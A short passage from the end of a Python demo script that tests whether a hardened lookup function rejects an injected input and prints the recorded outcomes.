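    try:
        lookup_hardened(conn, injected)
        results["hardened_injected"] = "executed"
    except ValueError:
        results["hardened_injected"] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
```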
